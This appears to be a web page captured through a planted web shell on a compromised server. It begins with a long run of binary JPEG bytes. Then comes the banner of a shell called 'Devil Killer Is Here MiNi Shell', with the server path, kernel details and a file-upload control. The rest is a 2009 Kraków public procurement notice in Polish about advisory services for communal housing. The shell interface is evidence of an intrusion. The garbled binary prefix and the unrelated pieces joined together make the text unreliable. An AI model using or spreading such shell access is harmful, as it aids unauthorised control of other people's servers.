JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090724/119105-N-2009.html

<p class="kh_header"><b>Kraków: Świadczenie usług doradczych dla Gminy Miejskiej Kraków w procesie przygotowania przedsięwzięcia inwestycyjnego w zakresie budowy mieszkań komunalnych przy udziale podmiotu prywatnego (znak OR-10.3410 - 61/09)</b><br>
<b>Numer ogłoszenia: 119105 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kraków, Urząd Miasta Krakowa, Oddział Zamówień Publicznych , pl. Wszystkich Świętych 3-4, 31-004 Kraków, woj. małopolskie, tel. 012 6161230, faks 012 6161217.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług doradczych dla Gminy Miejskiej Kraków w procesie przygotowania przedsięwzięcia inwestycyjnego w zakresie budowy mieszkań komunalnych przy udziale podmiotu prywatnego (znak OR-10.3410 - 61/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług doradczych dla Gminy Miejskiej Kraków, zwanej dalej Zamawiającym, w procesie przygotowania przedsięwzięcia inwestycyjnego w zakresie budowy mieszkań komunalnych. Przedmiot zamówienia obejmuje wykonanie niezbędnych badań i analiz (Faza I), doradztwo w procesie wyłaniania podmiotu prywatnego (Faza II) oraz przeprowadzenie warsztatów szkoleniowych dla Zamawiającego (nie więcej niż 10 osób).
Celem świadczonych usług doradczych jest określenie możliwości i zasadności realizacji przedsięwzięcia inwestycyjnego z dziedziny budownictwa komunalnego z udziałem podmiotu prywatnego, wskazanie na podstawie modelowych analiz opłacalności najbardziej efektywnych wariantów realizacji przedsięwzięcia inwestycyjnego oraz uczestnictwo w procesie wyłonienia podmiotu prywatnego, w tym przygotowanie dokumentów do zamówienia publicznego albo koncesji na roboty budowlane lub usługi w szczególności przygotowanie umowy na realizację przedsięwzięcia. Pod pojęciem przedsięwzięcia inwestycyjnego Zamawiający rozumie pozyskanie co najmniej 300 lokali mieszkalnych wraz z niezbędną infrastrukturą, przy wykorzystaniu należących do zamawiającego nieruchomości lub innych zasobów majątkowych, w tym np. nieruchomości stanowiących własność partnera prywatnego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.40.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany będzie wnieść wadium w wysokości 15 000 PLN (słownie: piętnaście tysięcy złotych) przed upływem terminu składania ofert, który zostanie wskazany w specyfikacji istotnych warunków zamówienia. 

Przed podpisaniem umowy Wykonawca, którego oferta zostanie wybrana, zobowiązany będzie do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10 % ceny brutto podanej  w ofercie<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> A). O zamówienie mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, w szczególności:
I. POSIADAJĄ WIEDZĘ I DOŚWIADCZENIE w dziedzinie usług doradczych  t.j. w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - wykonali należycie co najmniej 2 usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, polegające na: doradztwie w procesie przygotowania przedsięwzięcia inwestycyjnego z zakresu gospodarki komunalnej z udziałem podmiotu prywatnego, dotyczącego realizacji budynków użyteczności publicznej, budynków mieszkalnych wielorodzinnych, budynków zamieszkania zbiorowego lub budowli, w tym wykonali analizy formalno-prawnye oraz ekonomiczno-finansowe związane z finansowaniem takiego przedsięwzięcia oraz uczestniczyli w przygotowaniu dokumentacji postępowania mającego na celu wyłonienie partnera prywatnego, lub zarządzaniu albo nadzorze nad realizacją przedsięwzięcia inwestycyjnego z zakresu gospodarki komunalnej z udziałem podmiotu prywatnego, przy czym co najmniej jedna usługa powinna polegać na doradztwie w procesie przygotowania przedsięwzięcia inwestycyjnego z zakresu gospodarki komunalnej z udziałem podmiotu prywatnego, dotyczącego realizacji np. budynków użyteczności publicznej, budynków zamieszkania zbiorowego, budynków mieszkalnych wielorodzinnych lub budowli, obejmującą wykonanie analiz formalno-prawnych oraz ekonomiczno-finansowych, związanych z pozyskaniem finansowania dla wyżej opisanego przedsięwzięcia, jak również udział w przygotowaniu dokumentacji postępowania mającego na celu wyłonienie partnera prywatnego.
II. DYSPONUJĄ lub będą dysponować w okresie przewidzianym na realizację zamówienia odpowiednim potencjałem kadrowym (zespołem) - OSOBAMI zdolnymi do wykonania zamówienia, posiadającymi niezbędną wiedzę z zakresu między innymi: prawa cywilnego, prawa karnego, prawa zamówień publicznych, prawa administracyjnego, prawa finansów publicznych, prawa ochrony środowiska, prawa europejskiego, prawa budowlanego, przepisów dotyczących samorządu terytorialnego, przepisów dotyczących zasad przygotowania i realizacji inwestycji, w tym w szczególności:
1) co najmniej jedna osobą - która będzie pełniła rolę Lidera Zespołu posiadającą:
a) wykształcenie wyższe techniczne lub prawnicze lub ekonomiczne, 
b) doświadczenie łącznie: minimum 5 lat doświadczenia zawodowego w zakresie wykonywania analiz ekonomicznych i finansowych dotyczących przedsięwzięć inwestycyjnych oraz w zarządzaniu lub nadzorze nad przygotowaniem do realizacji przedsięwzięć z udziałem podmiotu prywatnego z zakresu gospodarki komunalnej lub nad realizacją takiego przedsięwzięcia oraz minimum 3 lata doświadczenia w zarządzaniu zasobami ludzkimi,
2) co  najmniej  jedna  osobą  - Eksperta II ds. Prawnych posiadającą:
a) wykształcenie wyższe prawnicze,
b) doświadczenie - uczestniczyła ona w ciągu 2 ostatnich lat w przygotowaniu lub wykonaniu przedsięwzięcia z zakresu gospodarki komunalnej z udziałem podmiotu prywatnego,
3) co najmniej jedna osobą - Eksperta III ds. Administracji Publicznej, posiadającą:
a) wykształcenie wyższe 
b) doświadczenie - uczestniczyła ona w ciągu 5 ostatnich lat w zarządzaniu lub nadzorze nad realizacją przedsięwzięć związanych z realizacją zadań publicznych w tym z zakresu gospodarki komunalnej. 
4) co najmniej jedna osobą - Eksperta IV ds. Analiz będzie posiadającą:
a) wykształcenie  wyższe techniczne lub prawnicze lub ekonomiczne,
b) doświadczenie - minimum 2 lat doświadczenia zawodowego w zakresie analiz ekonomicznych i finansowych w tym dotyczących przedsięwzięć z udziałem podmiotu prywatnego, 
5) co najmniej jedna osobą - Eksperta V ds. Budowlanych posiadającą:
a) uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej lub uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń,
b) doświadczenie w procesie inwestycyjnym tj. osoba ta pełniła funkcje głównego projektanta,  kierownika budowy lub inspektora nadzoru - koordynatora, w ciągu ostatnich 10 lat, dla co najmniej 2 budynków użyteczności publicznej lub budynków mieszkalnych wielorodzinnych lub budynków zamieszkania zbiorowego.
(Powyżej opisane doświadczenie, osoby wchodzące w skład zespołu, powinny posiadać łącznie).
PRZEZ BUDYNEK UŻYTECZNOŚCI PUBLICZNEJ - rozumie się budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji. Za budynek użyteczności publicznej uznaje się także budynek biurowy  i socjalny.
		
PRZEZ BUDYNEK ZAMIESZKANIA ZBIOROWEGO - rozumie się budynek przeznaczony do okresowego pobytu ludzi, w szczególności hotel, motel, pensjonat, dom wypoczynkowy, dom wycieczkowy, schronisko młodzieżowe, schronisko, internat, dom studencki, budynek koszarowy, budynek zakwaterowania na terenie zakładu karnego, aresztu śledczego, zakładu poprawczego, schroniska dla nieletnich, a także budynek do stałego pobytu ludzi, w szczególności dom dziecka, dom rencistów i dom zakonny.

ZA PRZEDSIĘWZIĘCIE INWESTYCYJNE Z UDZIAŁEM PODMIOTU PRYWATNEGO z zakresu gospodarki komunalnej, dotyczące realizacji np. budynków użyteczności publicznej, budynków zamieszkania zbiorowego, budynków mieszkalnych wielorodzinnych lub budowli uznaje się przedsięwzięcie, służące realizacji zadań publicznych o znaczeniu lokalnym, które należą do zakresu zadań jednostki samorządu terytorialnego i które to przedsięwzięcia cechuje długotrwałe współpraca z podmiotem prywatnym w celu ich realizacji.

B) Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu: 
1.	Ocena spełniania warunków udziału w postępowaniu dokonania zostanie na podstawie wymaganych dokumentów złożonych wraz z wnioskiem o dopuszczenie do udziału w postępowaniu.
2.	Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu, będzie większa niż 5, do składania ofert wstępnych zostaną zaproszeni wykonawcy, którzy otrzymają kolejno najwyższą ocenę spełniania warunku posiadanego doświadczenia, o którym mowa w sekcji III.2) punkt A) podp.I., w wyniku czego powstanie lista rankingowa wykonawców. 
3. Ocena warunku opisanego w sekcji III.2) punkt A) podp. I. - doświadczenie Wykonawcy - ocena punktowa złożonego wniosku stanowić będzie sumę punktów uzyskanych przez Wykonawcę odpowiednio do posiadanego przez niego doświadczenia. Wykonawca otrzyma za każdą wykonaną usługę  (wymienioną w wykazie usług doradczych), następującą liczbę punktów:
a)	Usługi polegające na doradztwie, dotyczące przedsięwzięć inwestycyjnych z zakresu gospodarki komunalnej z udziałem podmiotu prywatnego, obejmujące realizację budynków zamieszkania zbiorowego lub budynków mieszkalnych wielorodzinnych - 7 punktów za każdą usługę, 
b)   Usługi polegające na doradztwie, dotyczące przedsięwzięć inwestycyjnych z zakresu gospodarki komunalnej z udziałem podmiotu prywatnego, obejmujące realizację budynków użyteczności publicznej - 5 punktów za każdą usługę,
c)    Usługi polegające na doradztwie, dotyczące przedsięwzięć inwestycyjnych z zakresu gospodarki komunalnej z udziałem podmiotu prywatnego, obejmujące realizację budowli - 3 punkty za każdą usługę,
d)  Usługi w zakresie zarządzania lub nadzoru nad realizacją przedsięwzięcia inwestycyjnego z zakresu gospodarki komunalnej z udziałem podmiotu prywatnego -  10 punktów za każdą usługę.
Przy ocenie spełniania warunków pod uwagę będą brane tylko te pozycje wykazu, które zostaną potwierdzone stosownymi dokumentami (referencje, protokół odbioru, recenzje), że zostały wykonane należycie. 
4. Ocena warunku opisanego w sekcji III.2) punkt A) ppkt II.- według zasady: spełnia/nie spełnia (bez wpływu na ustalenie listy rankingowej).

5. Zamawiający zaprosi do składania ofert maksimum 5 Wykonawców, którzy wykażą się najwyższą sumą punktów uzyskanych w ocenie spełniana warunku posiadanego doświadczenia. W przypadku uzyskania przez dwóch lub więcej Wykonawców jednakowej liczby punktów w wyniku oceny spełnienia warunku opisanego w sekcji III.2) punkt A) podp. I. decydować będzie największa liczba wykonanych usług wskazanych kolejno w sekcji  III.2) pkt B) ppkt 3 lit. a) i d) ogłoszenia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> C) Wymagane dokumenty: 
1. WNIOSEK o dopuszczenie do udziału w postępowaniu zawierający następujące dane: nazwę, adres, numery telefonów i faksów wykonawcy (lub wykonawców wspólnie ubiegających się o udzielenie zamówienia) zgłaszającego wniosek, podpisany przez osobę upoważnianą do reprezentowania  Wykonawcy oraz spis dokumentów dołączonych do wniosku. 
2. OŚWIADCZENIE WYKONAWCY - wypełnione i podpisane odpowiednio przez - osoby upoważnione do reprezentowania Wykonawcy następującej treści: W imieniu Wykonawcy (podać firmę i adres), Stosownie do treści art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) oświadczam, iż Wykonawca którego reprezentuję:
1) posiada uprawnienia do wykonywania działalności lub czynności objętych niniejszym zamówieniem, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawia w załączeniu do składanego wniosku pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia;
4) nie podlega wykluczeniu z postępowania o udzielenie niniejszego zamówienia stosownie do treści art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.).
3. AKTUALNY ODPIS z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku zaświadczenia o wpisie do ewidencji działalności gospodarczej oznacza to, że powinno ono być wydane w trybie opisanym w dziale VII kodeksu postępowania administracyjnego - samo stwierdzenie przez właściwy organ zgodności z oryginałem z podaniem daty nie spełnia wymogów ustawy (nie jest wydaniem zaświadczenia), 
4. WYKAZ USŁUG doradczych wykonanych w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) - na potwierdzenie spełnienia warunku opisanego w sekcji III.2) punkt A) podp. I.  Wykaz usług powinien zawierać: a) nazwę i charakter usługi tj. doradztwo lub zarządzanie albo nadzór (w tym wskazanie rodzaju obiektu: budynek użyteczności publicznej/ budynek mieszkalny wielorodzinny/ budynek zamieszkania zbiorowego/ budowla), b) zakres usługi (rodzaj analiz, rodzaj procedury z udziałem podmiotu prywatnego wraz z nazwą tego partnera), rodzaj i przedmiot przedsięwzięcia z zakresu gospodarki komunalnej, rodzaj dokumentacji postępowania mającego na celu wyłonienie partnera prywatnego c) data wykonania usługi (rok i miesiąc) lub okres wykonywania usługi (rok i miesiąc - rok i miesiąc) d) wskazanie nazwy odbiorców/zamawiających, na rzecz których były wykonane wymienione w wykazie usługi (z podaniem ich adresu). 
5. DOKUMENTY POTWIERDZAJĄCE NALEŻYTE WYKONANIE lub wykonywanie usług wymienionych w Wykazie usług, o którym mowa w pkt. 4. powyżej,
6. WYKAZ OSÓB wchodzących w skład zespołu przewidywanego do realizacji  zamówienia, którymi Wykonawca dysponuje lub będzie dysponował w trakcie realizacji zamówienia (na potwierdzenie spełnienia warunku opisanego w sekcji III.2) punkt A) podp. II.). Wykaz osób winien zawierać:  imię i nazwisko członka zespołu ze wskazaniem funkcji przy realizacji zamówienia, w tym wskazanie Lidera zespołu, rodzaj wykształcenia, zakres czynności przewidzianych przy realizacji zamówienia, posiadane kwalifikacje: zakres tematyczny wykonanej lub wykonywanej usługi, datę jej wykonania lub wykonywania - dotyczy zarządzania lub nadzoru nad realizacją przedsięwzięć, nazwę i adres zlecającego, wskazanie rodzaju analiz, przedmiotu i zakresu przedsięwzięć z zakresu gospodarki komunalnej z udziałem podmiotu prywatnego z podaniem rodzaju realizowanego obiektu, rodzaju, zakresu i terminu zarządzania zasobami ludzkimi w związku z konkretnym przedsięwzięciem, tytułu i wskazania funkcji pełnionej w procesie inwestycyjnym, rodzaju uprawnień budowlanych (jeśli dotyczy)), 
7. Jeżeli w Wykazie osób, o którym mowa powyżej, Wykonawca wskazał osoby, którymi nie dysponuje w dniu składania wniosków, a będzie dysponował nimi w okresie przewidzianym na realizację zamówienia - składa z wnioskiem również PISEMNE ZOBOWIĄZANIE tych osób, podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. 
8. Dokument potwierdzający posiadanie UPRAWNIEŃ BUDOWLANYCH dla osoby eksperta budowlanego wymienionej w wykazie osób, o którym mowa powyżej.

D)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy: 
1.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. wspólnicy spółki cywilnej lub członkowie konsorcjum) są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.
2.W takim przypadku - oprócz dokumentów wymienionych w sekcji III.2) pkt C)ogłoszenia - wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia we wniosku Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt.1. powyżej. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają (podpisane przez ustanowionego Pełnomocnika lub potwierdzone przez niego za zgodność z oryginałem) dokumenty: 
a) wniosek o dopuszczenie do udziału w postępowaniu. 
b) zamiast Oświadczenia Wykonawcy wymienionego w sekcji III.2) pkt C)2. ogłoszenia - Oświadczenie Pełnomocnika wykonawców wspólnie ubiegających się o udzielenie zamówienia o treści: 
Działając jako Pełnomocnik wymienionych Wykonawców wspólnie ubiegających się o udzielenie zamówienia (podać firmę i adres), stosownie do treści art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) oświadczam, że:
1)	wspólnie posiadają uprawnienia do wykonywania działalności lub czynności objętych niniejszym zamówieniem, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	wspólnie posiadają niezbędną wiedzę i doświadczenie, a także wspólnie dysponują potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawiają, w załączeniu do składanego wniosku, pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	wspólnie znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia;
Ponadto oświadczam, iż żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
4)	nie podlega wykluczeniu z postępowania o udzielenie niniejszego zamówienia stosownie do treści art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.).
c) każdy z osobna - dotyczące ich dokumenty wymienione w sekcji III.2) ppkt C)3. ogłoszenia; 
d) łącznie dokumenty o których mowa w pkt III.2) pkt C) ppkt 1 oraz 4 do 8 składa ten Wykonawca (ci Wykonawcy), który spełnia warunek na potwierdzenie którego dokument ten jest wymagany. 

E). Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu wykonawców mających siedzibę lub miejsce zamieszkania za granicą: 
1. Gdy wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w sekcji III.2) pkt C) ppkt. 3. ogłoszenia - składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, ani nie ogłoszono jego upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków. 2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w sekcji III.2) pkt C) ppkt.3. ogłoszenia zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> SIWZ niedostępna na etapie składania wniosków o dopuszczenie do udziału w postępowniu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ zostanie przekazana wykonawcom, którzy spełnią warunki udziału w postępowaniu, wraz z zaproszeniem do składania ofert na dalszym etapie tego postępowania.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2009 godzina 12:00, miejsce: Urząd Miasta Krakowa, 31-004 Kraków, Plac Wszystkich Świętych 3-4, Kancelaria Magistratu, stanowisko nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Sposób przygotowania wniosku o dopuszczenie do udziału w postępowaniu: 
1.1.	Wykonawca może złożyć tylko jeden wniosek, sporządzony na piśmie w języku polskim w sposób czytelny i trwały, podpisany przez osobę/y upoważnioną do reprezentowania Wykonawcy.
1.2.	Część wniosku, która zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, a wykonawca zastrzega ich poufność, należy umieścić w odrębnej kopercie z opisem: Zastrzeżona część wniosku. Zamawiający nie odpowiada za ujawnienie informacji stanowiących tajemnicę przedsiębiorstwa przekazanych mu przez Wykonawcę wbrew postanowieniom niniejszego podpunktu. 
1.3.	Wszystkie dokumenty załączone do wniosku winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania Wykonawcy na każdej zapisanej stronie poświadczanego dokumentu. Przy czym Pełnomocnictwo musi być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza.
